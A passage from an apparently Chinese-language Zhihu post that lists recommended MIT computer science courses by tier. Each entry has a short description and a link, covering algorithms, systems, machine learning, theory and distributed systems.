ๆœฌ่ฏพ็จ‹ไป‹็ปไบ†ๆ•ฐๅญ—็ณป็ปŸๅ’Œ่ฎก็ฎ—ๆœบๆžถๆž„็š„่ฎพ่ฎกใ€‚ๅผบ่ฐƒไปฅ้ซ˜็บง็กฌไปถ่ฏญ่จ€่กจ่พพๆ‰€ๆœ‰็กฌไปถ่ฎพ่ฎกๅนถ็ปผๅˆ่ฎพ่ฎก๏ผŒไธป้ข˜ๅŒ…ๆ‹ฌ็ป„ๅˆ็”ต่ทฏๅ’Œ้กบๅบ็”ต่ทฏใ€ๅฏ็ผ–็จ‹็กฌไปถๆŒ‡ไปค้›†ๆŠฝ่ฑกใ€ๅ•ๅ‘จๆœŸๅ’Œ็ฎก้“ๅค„็†ๅ™จๅฎž็Žฐใ€ๅคš็บงๅ†…ๅญ˜ๅฑ‚ๆฌก็ป“ๆž„ใ€่™šๆ‹Ÿๅ†…ๅญ˜ใ€ๅผ‚ๅธธๅ’Œ I/O ไปฅๅŠๅนถ่กŒ็ณป็ปŸใ€‚ ๅœฐๅ€๏ผš[https://6004.mit.edu/web/spring20](https://link.zhihu.com/?target=https%3A//6004.mit.edu/web/spring20) - **6.006: Introduction to Algorithms** ๆœฌ่ฏพ็จ‹ไป‹็ปไบ†่ฎก็ฎ—้—ฎ้ข˜็š„ๆ•ฐๅญฆๅปบๆจกใ€‚ๅฎƒๆถต็›–ไบ†็”จไบŽ่งฃๅ†ณ่ฟ™ไบ›้—ฎ้ข˜็š„ๅธธ่ง็ฎ—ๆณ•๏ผŒ็ฎ—ๆณ•่Œƒไพ‹ๅ’Œๆ•ฐๆฎ็ป“ๆž„ใ€‚่ฏฅ่ฏพ็จ‹ๅผบ่ฐƒ็ฎ—ๆณ•ไธŽ็ผ–็จ‹ไน‹้—ด็š„ๅ…ณ็ณป๏ผŒๅนถไป‹็ป้’ˆๅฏน่ฟ™ไบ›้—ฎ้ข˜็š„ๅŸบๆœฌๆ€ง่ƒฝๆŒ‡ๆ ‡ๅ’Œๅˆ†ๆžๆŠ€ๆœฏใ€‚ ๅœฐๅ€๏ผš[https://ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-006-introduction-to-algorithms-fall-2011/](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-006-introduction-to-algorithms-fall-2011/) - **6.009: Fundamentals of Programming** ๆœฌ่ฏพ็จ‹ไป‹็ป็ผ–็จ‹็š„ๅŸบๆœฌๆฆ‚ๅฟตใ€‚ๆ—จๅœจๅŸนๅ…ปๅฐ†ๅŸบๆœฌๆ–นๆณ•ไปŽ็ผ–็จ‹่ฏญ่จ€ๅบ”็”จไบŽๆŠฝ่ฑก้—ฎ้ข˜็š„ๆŠ€่ƒฝใ€‚ไธป้ข˜ๅŒ…ๆ‹ฌ็ผ–็จ‹ๅ’Œ Python ๅŸบ็ก€็Ÿฅ่ฏ†ใ€่ฎก็ฎ—ๆฆ‚ๅฟตใ€่ฝฏไปถๅทฅ็จ‹ใ€็ฎ—ๆณ•ๆŠ€ๆœฏใ€ๆ•ฐๆฎ็ฑปๅž‹ๅ’Œ้€’ๅฝ’ใ€‚ๅฎž้ชŒ็ป„ไปถๅŒ…ๆ‹ฌ่ฝฏไปถ่ฎพ่ฎกใ€ๆ–ฝๅทฅๅ’Œ่ฎพ่ฎกๅฎžๆ–ฝใ€‚ ๅœฐๅ€๏ผš[https://py.mit.edu/spring20](https://link.zhihu.com/?target=https%3A//py.mit.edu/spring20) - **6.004 ่ฎก็ฎ—็ป“ๆž„** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Computation Structures (Spring 2017)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-004-computation-structures-spring-2017) - **6.005 ่ฝฏไปถๆž„ๅปบ๏ผˆJava๏ผ‰** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Software Construction (Spring 2016)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-005-software-construction-spring-2016/) Java็š„ๅŸบ็ก€่ฏพ็จ‹๏ผŒๅฏไปฅๅ’Œ6.031ไธ€่ตทๅญฆไน ใ€‚ - **6.006 ็ฎ—ๆณ•ๅฏผ่ฎบ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Introduction to Algorithms (Fall 2011)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-006-introduction-to-algorithms-fall-2011) - **6.008 ๆŽฅๅฃๆŠ€ๆœฏๅฏผ่ฎบ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Introduction to Inference๏ผˆ2014๏ผ‰](https://link.zhihu.com/?target=http%3A//web.mit.edu/6.008/www/videos/) - **6.009 ็จ‹ๅบ่ฎพ่ฎกๅŸบ็ก€** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Fundamentals of Programming](https://link.zhihu.com/?target=https%3A//py.mit.edu/spring21) - **6.033 ่ฎก็ฎ—ๆœบ็ณป็ปŸ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Computer System Engineering (Spring 2018)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-033-computer-system-engineering-spring-2018) - **6.034 ไบบๅทฅๆ™บ่ƒฝ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Artificial Intelligence (Fall 2010)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-034-artificial-intelligence-fall-2010)ใ€[Artificial Intelligence (Spring 2005)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-034-artificial-intelligence-spring-2005) - **6.041 ๆฆ‚็Ž‡็ณป็ปŸๅˆ†ๆžๅ’Œๅบ”็”จๆฆ‚็Ž‡่ฎบ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Probabilistic Systems Analysis and Applied Probability (Fall 2010)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-041-probabilistic-systems-analysis-and-applied-probability-fall-2010)ใ€[Probabilistic Systems Analysis and Applied Probability (Fall 2013)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-041sc-probabilistic-systems-analysis-and-applied-probability-fall-2013) - **6.042J ่ฎก็ฎ—ๆœบ็ง‘ๅญฆไธญ็š„ๆ•ฐๅญฆ๏ผˆ็ฆปๆ•ฃๆ•ฐๅญฆ๏ผ‰** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Mathematics for Computer Science (Spring 2015)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-042j-mathematics-for-computer-science-spring-2015) ## ่ฟ›้˜ถ็ง‘็›ฎ ่ฟ›้˜ถ็ง‘็›ฎๅˆ™ๆ˜ฏไธบไบ†ๅคงไธ‰ๅคงๅ››ไปฅๅŠ็ ”ไธ€ๅŒๅญฆ่ฎพ็ซ‹ใ€‚ ไปฅไธ‹่ฏพ็จ‹ๅช้œ€่ฆ้€‰ๆ‹ฉไธคไธ‰้—จ่ฏพๆฅๅญฆไน ๅฐฑๅฏไปฅไบ†ใ€‚ - **6.031 ่ฝฏไปถๆž„ๅปบ๏ผˆJava๏ผ‰** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Software Construction](https://link.zhihu.com/?target=http%3A//web.mit.edu/6.031/www/fa20/) ่ฟ™้—จ่ฏพไธป่ฆๅญฆ็š„ๆ˜ฏJava๏ผŒๆฒกๆœ‰ๅ‚่€ƒไนฆ๏ผŒ่ฏพ็จ‹้“พๆŽฅๆœ‰ๆฏ”่พƒ่ฏฆ็ป†็š„็บฟไธŠๆ•™็จ‹๏ผ›ๅฏไปฅๅ’Œ6.005ไธ€่ตทๅญฆไน ใ€‚ - **6.033 ่ฎก็ฎ—ๆœบ็ณป็ปŸๅทฅ็จ‹** ่ฏพ็จ‹ๅœฐๅ€๏ผš[6.033](https://link.zhihu.com/?target=http%3A//student.mit.edu/catalog/m6a.html%236.033) Computer Systems Engineering (12) - **6.035 ่ฎก็ฎ—ๆœบ่ฏญ่จ€ๅทฅ็จ‹ โ˜…**โ˜…โ˜…โ˜…โ˜… ่ฏพ็จ‹ๅœฐๅ€๏ผš[Computer Language Engineering (Spring 2010)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-035-computer-language-engineering-spring-2010)ใ€[Computer Language Engineering (SMA 5502) (Fall 2005)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-035-computer-language-engineering-sma-5502-fall-2005) - **6.036 ๆœบๅ™จๅญฆไน ๅฏผ่ฎบ** โ˜…โ˜…โ˜…โ˜…โ˜… ่ฏพ็จ‹ๅœฐๅ€๏ผš[Introduction to Machine Learning (Fall 2020)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-036-introduction-to-machine-learning-fall-2020) - **6.045J ่‡ชๅŠจๆœบใ€ๅฏ่ฎก็ฎ—ๆ€งๅ’Œๅคๆ‚ๆ€ง** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Automata, Computability, and Complexity (Spring 2011)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-045j-automata-computability-and-complexity-spring-2011) - **6.046J ็ฎ—ๆณ•็š„่ฎพ่ฎกไธŽๅˆ†ๆž** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Design and Analysis of Algorithms (Spring 2015)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-046j-design-and-analysis-of-algorithms-spring-2015) - **6.073 ่ง†้ข‘ๆธธๆˆๅผ€ๅ‘** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Creating Video Games (Fall 2014)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/comparative-media-studies-writing/cms-611j-creating-video-games-fall-2014) - **6.080/6.089 ่ฎก็ฎ—ๆœบ็ง‘ๅญฆ็š„ไผŸๅคง็†่ฎบโ˜…โ˜…โ˜…โ˜…โ˜…** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Great Ideas in Theoretical Computer Science (Spring 2008)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-080-great-ideas-in-theoretical-computer-science-spring-2008) - **6.170 ่ฝฏไปถๅทฅ็จ‹๏ผˆๅ‰็ซฏๅผ€ๅ‘JavaScript๏ผ‰** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Software Studio](https://link.zhihu.com/?target=https%3A//canvas.mit.edu/courses/4415) ่ฟ™้—จ่ฏพไปฅๅ‰ๆ˜ฏไฝฟ็”จRuby็š„Railsๅ’ŒJavaScriptๆฅๆญๅปบไธ€ไธช**ๅ…จๆ ˆๅผ€ๅ‘้กน็›ฎ**ใ€‚่€Œ็Žฐๅœจๅˆ™ๅฎŒๅ…จๆ˜ฏไฝฟ็”จJavaScriptๆฅๅšๅ…จๆ ˆๅผ€ๅ‘๏ผŒๅ†…ๅฎนๅŒ…ๅซNodeใ€MySQLใ€React็ญ‰ใ€‚ - **6.171 Webๅบ”็”จๅผ€ๅ‘ไธŽ่ฝฏไปถๅทฅ็จ‹** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Software Engineering for Web Applications (Fall 2003)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-171-software-engineering-for-web-applications-fall-2003/) ่ฟ™้—จ่ฏพๅฏไปฅๅ’Œ6.170ไธ€่ตทๅญฆ๏ผŒไธป่ฆๅฆ‚ไฝ•ๆž„ๅปบ้ซ˜ๅนถๅ‘ใ€ๅฎ‰ๅ…จใ€ๅฏ้ ็ญ‰็š„Webๅบ”็”จ - **6.172 ่ฝฏไปถ็ณป็ปŸ็š„ๆ€ง่ƒฝ๏ผˆC่ฏญ่จ€๏ผ‰** โ˜…โ˜…โ˜…โ˜…โ˜… ่ฏพ็จ‹ๅœฐๅ€๏ผš[Performance Engineering of Software Systems (Fall 2018)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-172-performance-engineering-of-software-systems-fall-2018/) ่ฟ™้—จ่ฏพไธป่ฆๆ•™ไฝ ๅฆ‚ไฝ•ๆž„ๅปบๅคงๅž‹้ซ˜ๆ€ง่ƒฝ็š„่ฝฏไปถ็ณป็ปŸ๏ผŒๅŒ…ๅซๆ€ง่ƒฝๅˆ†ๆžใ€้ซ˜ๆ€ง่ƒฝใ€็ผ“ๅญ˜ไผ˜ๅŒ–ใ€ๅนถ่กŒ็จ‹ๅบ็ญ‰๏ผŒไฝฟ็”จ็š„ๆ˜ฏC่ฏญ่จ€ใ€‚่ฟ™้—จ่ฏพๆฒกๆœ‰ๅ‚่€ƒๆ•™ๆ๏ผŒๅ€’ๆ˜ฏๆœ‰ไธ€ๅ †ๆ–‡็ซ ้œ€่ฆไฝ ้˜…่ฏป๏ผŒๅ…ทไฝ“ๅฏไปฅๅŽปๅฎ˜็ฝ‘็š„Readingsไบ†่งฃใ€‚ - **6.175 ่ฎก็ฎ—ๆœบไฝ“็ณป็ป“ๆž„** โ˜…โ˜…โ˜…โ˜…โ˜… ่ฏพ็จ‹ๅœฐๅ€๏ผš[Constructive Computer Architecture](https://link.zhihu.com/?target=http%3A//csg.csail.mit.edu/6.175/) ๅญฆ่ฟ™้—จ่ฏพ้œ€่ฆไฝ ๆŽŒๆกไธ€้—จ้ขๅ‘ๅฏน่ฑก็š„็ผ–็จ‹่ฏญ่จ€๏ผˆJavaๆˆ–C++๏ผ‰ๆˆ–ๅ‡ฝๆ•ฐๅผ็ผ–็จ‹่ฏญ่จ€๏ผˆMLๆˆ–Haskell๏ผ‰,ไปฅๅŠ6.004ใ€6.005 - **6.207J ่ฎก็ฎ—ๆœบ็ฝ‘็ปœ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Networks (Spring 2018)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/economics/14-15j-networks-spring-2018) - **6.338J ๅนถ่กŒ่ฎก็ฎ—** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Parallel Computing (Fall 2011)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/mathematics/18-337j-parallel-computing-fall-2011) - **6.801 ๆœบๅ™จ่ง†่ง‰** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Machine Vision (Fall 2020)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-801-machine-vision-fall-2020) - **6.803 ไบบๅทฅๆ™บ่ƒฝไบ‹ไธš** ่ฏพ็จ‹ๅœฐๅ€๏ผš[The Human Intelligence Enterprise (Spring 2019)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-803-the-human-intelligence-enterprise-spring-2019) - **6.804J ่ฎก็ฎ—ไบบ็Ÿฅ็ง‘ๅญฆ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Computational Cognitive Science (Fall 2004)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/brain-and-cognitive-sciences/9-66j-computational-cognitive-science-fall-2004) - **6.811 ่พ…ๅŠฉๆŠ€ๆœฏๅŽŸ็†ไธŽๅฎžๆˆ˜** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Principles and Practice of Assistive Technology (Fall 2014)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-811-principles-and-practice-of-assistive-technology-fall-2014) - **6.813 ็”จๆˆท็•Œ้ข่ฎพ่ฎกไธŽๅฎž่ทต** ่ฏพ็จ‹ๅœฐๅ€๏ผš[User Interface Design and Implementation (Spring 2011)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-831-user-interface-design-and-implementation-spring-2011) - **6.815/6.865 ๆ•ฐๅญ—ไธŽ่ฎก็ฎ—ๆˆๅƒ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Digital and Computational Photography](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/media-arts-and-sciences/mas-531-computational-camera-and-photography-fall-2009/syllabus/) - **6.816/6.189 ๅคšๅค„็†ๅ™จ็ผ–็จ‹็š„่‰บๆœฏ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Multicore Programming Primer (January IAP 2007)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-189-multicore-programming-primer-january-iap-2007) ่ฟ™้—จ่ฏพๆฒกๆœ‰ๅฏนๅค–ๅ…ฌๅผ€๏ผŒๅชไบ†่งฃๅˆฐๅฎƒไฝฟ็”จ็š„ๅ‚่€ƒๆ•™ๆๆ˜ฏใ€Šๅคšๅค„็†ๅ™จ็ผ–็จ‹็š„่‰บๆœฏใ€‹ - **6.819/6.869๏ผš้ซ˜็บง่ฎก็ฎ—ๆœบ่ง†่ง‰** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Advances in Computer Vision (12)](https://link.zhihu.com/?target=http%3A//6.869.csail.mit.edu/sp21/) - **6.820 ็จ‹ๅบๅˆ†ๆžๅŸบ็ก€** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Fundamentals of Program Analysis (Fall 2015)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-820-fundamentals-of-program-analysis-fall-2015) - **6.837 ่ฎก็ฎ—ๆœบๅ›พๅฝขๅญฆ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Computer Graphics (Fall 2012)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-837-computer-graphics-fall-2012/) - **18.404/6.840 ่ฎก็ฎ—็†่ฎบๅฏผๅผ•** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Theory of Computation (12)](https://link.zhihu.com/?target=https%3A//math.mit.edu/~sipser/18404/) ## ไธ“ไธš็ง‘็›ฎ - **6.034: Artificial Intelligence** ๆœฌ่ฏพ็จ‹ๅ‘ๅญฆ็”Ÿไป‹็ปไบบๅทฅๆ™บ่ƒฝ็š„ๅŸบๆœฌ็Ÿฅ่ฏ†่กจ็Žฐใ€้—ฎ้ข˜่งฃๅ†ณๅ’Œๅญฆไน ๆ–นๆณ•ใ€‚ๅฎŒๆˆ 6.034 ๅŽ๏ผŒๅญฆ็”Ÿๅบ”่ฏฅ่ƒฝๅคŸ้€š่ฟ‡็ป„่ฃ…่งฃๅ†ณๆ–นๆกˆๆฅๅผ€ๅ‘ๆ™บ่ƒฝ็ณป็ปŸ๏ผŒไปŽ่€Œ่งฃๅ†ณๅ…ทไฝ“็š„่ฎก็ฎ—้—ฎ้ข˜๏ผ›ไบ†่งฃ็Ÿฅ่ฏ†่กจ็Žฐใ€้—ฎ้ข˜่งฃๅ†ณๅ’Œๅญฆไน ๅœจๆ™บ่ƒฝ็ณป็ปŸๅทฅ็จ‹ไธญ็š„ไฝœ็”จ๏ผ›ๅนถ็†่งฃ่งฃๅ†ณ้—ฎ้ข˜ใ€่ง†่ง‰ๅ’Œ่ฏญ่จ€ๅœจไปŽ่ฎก็ฎ—่ง’ๅบฆ็†่งฃไบบ็ฑปๆ™บๅŠ›ๆ–น้ข็š„ไฝœ็”จใ€‚ ๅœฐๅ€๏ผš[https://ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-034-artificial-intelligence-fall-2010/](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-034-artificial-intelligence-fall-2010/) [https://ai6034.mit.edu/wiki/index.php?title=Main_Page](https://link.zhihu.com/?target=https%3A//ai6034.mit.edu/wiki/index.php%3Ftitle%3DMain_Page) - **6.033: Computer Systems Engineering (CI-M)** ๆœฌ่ฏพ็จ‹ๅŒ…ๆ‹ฌๆœ‰ๅ…ณ่ฎก็ฎ—ๆœบ่ฝฏไปถๅ’Œ็กฌไปถ็ณป็ปŸๅทฅ็จ‹็š„ไธป้ข˜ใ€‚ไธป้ข˜ๅŒ…ๆ‹ฌๆŽงๅˆถๅคๆ‚ๆ€ง็š„ๆŠ€ๆœฏ๏ผ›ไฝฟ็”จๅฎขๆˆท็ซฏ - ๆœๅŠกๅ™จ่ฎพ่ฎกใ€ๆ“ไฝœ็ณป็ปŸ็š„ๅผบๅคงๆจกๅ—ๅŒ–๏ผ›ๆ€ง่ƒฝ๏ผŒ็ฝ‘็ปœ๏ผ›ๅ‘ฝๅ๏ผ›ๅฎ‰ๅ…จๅ’Œ้š็ง๏ผ›ๅฎน้”™็ณป็ปŸใ€ๅนถๅ‘ๆดปๅŠจ็š„ๅŽŸๅญๆ€งๅ’Œๅ่ฐƒๆ€งไปฅๅŠๆขๅค๏ผ›่ฎก็ฎ—ๆœบ็ณป็ปŸๅฏน็คพไผš็š„ๅฝฑๅ“ใ€‚ ๅœฐๅ€๏ผš[https://web.mit.edu/6.033/www/](https://link.zhihu.com/?target=https%3A//web.mit.edu/6.033/www/) - **6.031: Elements of Software Construction** ไป‹็ป่ฝฏไปถๅผ€ๅ‘็š„ๅŸบๆœฌๅŽŸๅˆ™ๅ’ŒๆŠ€ๆœฏ๏ผšๅฆ‚ไฝ•็ผ–ๅ†™ๅฎ‰ๅ…จๆ— ้”™่ฏฏใ€ๆ˜“ไบŽ็†่งฃไธ”ๆ˜“ไบŽๆ›ดๆ”น็š„่ฝฏไปถใ€‚ไธป้ข˜ๅŒ…ๆ‹ฌ่ง„่Œƒๅ’Œไธๅ˜๏ผ›ๆต‹่ฏ•ใ€ๆต‹่ฏ•็”จไพ‹็”Ÿๆˆๅ’Œ่ฆ†็›–่Œƒๅ›ด๏ผ›ๆŠฝ่ฑกๆ•ฐๆฎ็ฑปๅž‹ๅ’Œ่กจ็คบ็‹ฌ็ซ‹ๆ€ง๏ผ›้ขๅ‘ๅฏน่ฑก็ผ–็จ‹็š„่ฎพ่ฎกๆจกๅผ๏ผ›ๅนถๅ‘็ผ–็จ‹๏ผŒๅŒ…ๆ‹ฌๆถˆๆฏไผ ้€’ๅ’Œๅ…ฑไบซๅ†…ๅญ˜ๅนถๅ‘๏ผŒๆญป้”๏ผ›ๅ‡ฝๆ•ฐ็ผ–็จ‹๏ผŒๅ…ทๆœ‰ไธๅฏๅ˜็š„ๆ•ฐๆฎๅ’Œ้ซ˜้˜ถๅ‡ฝๆ•ฐใ€‚ ๅœฐๅ€๏ผš[https://web.mit.edu/6.031/www/sp20/](https://link.zhihu.com/?target=https%3A//web.mit.edu/6.031/www/sp20/) - **6.036 Introduction to Machine Learning** ไปŽๅปบๆจกๅ’Œ้ข„ๆต‹็š„่ง’ๅบฆไป‹็ปๆœบๅ™จๅญฆไน ็š„ๅŽŸๅˆ™ใ€็ฎ—ๆณ•ๅ’Œๅบ”็”จ๏ผ›ๅˆถๅฎšๅญฆไน ้—ฎ้ข˜๏ผ›ไปฃ่กจๆ€งใ€่ฟ‡ๅบฆๆ‹Ÿๅˆใ€ๆฆ‚ๆ‹ฌๆ€ง๏ผ›่š็ฑปใ€ๅˆ†็ฑปใ€ๆฆ‚็Ž‡ๅปบๆจก๏ผ›ๅ’Œ่ฏธๅฆ‚ๆ”ฏๆŒๅ‘้‡ๆœบใ€้šๅผ้ฉฌๅฐ”็ง‘ๅคซๆจกๅž‹ๅ’Œ็ฅž็ป็ฝ‘็ปœ็ญ‰ๆ–นๆณ•ใ€‚ ๅœฐๅ€๏ผš[https://openlearninglibrary.mit.edu/courses/course-v1:MITx+6.036+1T2019/about](https://link.zhihu.com/?target=https%3A//openlearninglibrary.mit.edu/courses/course-v1%3AMITx%2B6.036%2B1T2019/about) - **6.045: Automata, Computability, and Complexity** ๅ…ณไบŽ่ฎก็ฎ—ๅฎšไน‰้—ฎ้ข˜็š„ๆ•ฐๅญฆไป‹็ป๏ผŒไปฅๅŠ่ฎก็ฎ—ๆœบๅฏไปฅ่งฃๅ†ณ็š„้—ฎ้ข˜ใ€‚่€ƒ่™‘้€š่ฟ‡ๆœ‰้™็š„่‡ชๅŠจๆœบ๏ผŒ็”ต่ทฏ๏ผŒๅ›พ็ตๆœบๅ’Œ้€šไฟกๅคๆ‚ๆ€งๅฏไปฅๆœ‰ๆ•ˆ่งฃๅ†ณๅ“ชไบ›้—ฎ้ข˜ใ€‚ๅœจๆŸไบ›ๆƒ…ๅ†ตไธ‹๏ผŒไธบ้—ฎ้ข˜ๆไพ›ๅฎŒๆ•ด๏ผŒไธฅๆ ผ็š„็ญ”ๆกˆใ€‚ๅปบ็ซ‹ๆ นๆฎ้šพๅบฆๅฏน่ฎก็ฎ—้—ฎ้ข˜่ฟ›่กŒๅˆ†็ฑป็š„ๆŠ€่ƒฝใ€‚่ฎจ่ฎบๅ…ถไป–ๅŸบๆœฌ้—ฎ้ข˜๏ผŒๅŒ…ๆ‹ฌ Church-Turing ่ฎบๆ–‡๏ผŒP ไธŽ NP ้—ฎ้ข˜ไปฅๅŠ้šๆœบๆ€งใ€‚ ๅœฐๅ€๏ผš[https://people.csail.mit.edu/rrw/6.045-2020/](https://link.zhihu.com/?target=https%3A//people.csail.mit.edu/rrw/6.045-2020/) - **6.046: Design and Analysis of Algorithms** ้ซ˜ๆ•ˆ็ฎ—ๆณ•็š„่ฎพ่ฎกไธŽๅˆ†ๆžๆŠ€ๆœฏ๏ผŒๅผบ่ฐƒๅœจๅฎž่ทตไธญๆœ‰็”จ็š„ๆ–นๆณ•ใ€‚ไธป้ข˜ๅŒ…ๆ‹ฌๆŽ’ๅบ๏ผ›ๆœ็ดขๆ ‘ใ€ๅ †ๅ’Œๅ“ˆๅธŒ๏ผ›ๅˆ†่€Œๆฒปไน‹๏ผ›ๅŠจๆ€็ผ–็จ‹๏ผ›่ดชๅฉช็ฎ—ๆณ•๏ผ›ๆ‘Š้”€ๅˆ†ๆž๏ผ›ๅ›พๅฝข็ฎ—ๆณ•๏ผ›ๅ’Œๆœ€็Ÿญ็š„่ทฏๅพ„ใ€‚้ซ˜็บงไธป้ข˜ๅฏ่ƒฝๅŒ…ๆ‹ฌ็ฝ‘็ปœๆต๏ผ›่ฎก็ฎ—ๅ‡ ไฝ•๏ผ›ๆ•ฐๅญ—็†่ฎบ็ฎ—ๆณ•๏ผ›ๅคš้กนๅผๅ’Œ็Ÿฉ้˜ต่ฎก็ฎ—๏ผ›็ผ“ๅญ˜๏ผ›ๅ’Œๅนถ่กŒ่ฎก็ฎ—ใ€‚ ๅœฐๅ€๏ผš[https://ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-046j-design-and-analysis-of-algorithms-spring-2015/](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-046j-design-and-analysis-of-algorithms-spring-2015/) ## ้ซ˜็บง็ง‘็›ฎ ้ซ˜็บง็ง‘็›ฎๅพˆๅคš๏ผŒ่ฟ™้‡ŒๅชๆŽจ่ไธ€ไบ›ๆฏ”่พƒ็Ÿฅๅ&ไธชไบบๆ„Ÿๅ…ด่ถฃ็š„๏ผš - **6.824: Distributed Systems** ๆœฌ่ฏพ็จ‹ไป‹็ปๅˆ†ๅธƒๅผ็ณป็ปŸ่ฎพ่ฎก็š„ๆŠฝ่ฑกๅ’Œๅฎž็ŽฐๆŠ€ๆœฏใ€‚ไธป้ข˜ๅŒ…ๆ‹ฌ๏ผšๆœๅŠกๅ™จ่ฎพ่ฎกใ€็ฝ‘็ปœ็ผ–็จ‹ใ€ๅ‘ฝๅใ€ๅญ˜ๅ‚จ็ณป็ปŸใ€ๅฎ‰ๅ…จๆ€งๅ’Œๅฎน้”™่ƒฝๅŠ›ใ€‚ ๅœฐๅ€๏ผš[https://pdos.csail.mit.edu/6.824/](https://link.zhihu.com/?target=https%3A//pdos.csail.mit.edu/6.824/) - **6.828: Operating System Engineering** ๆœฌ่ฏพ็จ‹็ ”็ฉถๆ“ไฝœ็ณป็ปŸๅทฅ็จ‹็š„ๅŸบๆœฌ่ฎพ่ฎกๅ’Œๅฎž็Žฐ็†ๅฟตใ€‚่ฎฒๅบงไปฅ UNIX ๅ’Œ็ ”็ฉถ่ฎบๆ–‡็š„็ ”็ฉถไธบๅŸบ็ก€ใ€‚ไธป้ข˜ๅŒ…ๆ‹ฌ่™šๆ‹Ÿๅ†…ๅญ˜ใ€็บฟ็จ‹ใ€ไธŠไธ‹ๆ–‡ๅˆ‡ๆขใ€ๅ†…ๆ ธใ€ไธญๆ–ญใ€็ณป็ปŸ่ฐƒ็”จใ€่ฟ›็จ‹้—ด้€šไฟกใ€ๅ่ฐƒๅ’Œ่ฝฏไปถๅ’Œ็กฌไปถไน‹้—ด็š„ไบคไบ’ใ€‚ๅ•ไธชๅฎž้ชŒๅฎคไปปๅŠกๆถ‰ๅŠๅœจ C ไธญๅฎžๆ–ฝๅฐๅž‹ๆ“ไฝœ็ณป็ปŸ๏ผŒๅนถๅธฆๆœ‰ไธ€ไบ› x86 ็ป„ไปถใ€‚ ๅœฐๅ€๏ผš[https://pdos.csail.mit.edu/6.828/2019/schedule.html](https://link.zhihu.com/?target=https%3A//pdos.csail.mit.edu/6.828/2019/schedule.html) - **6.829: Computer Networks** 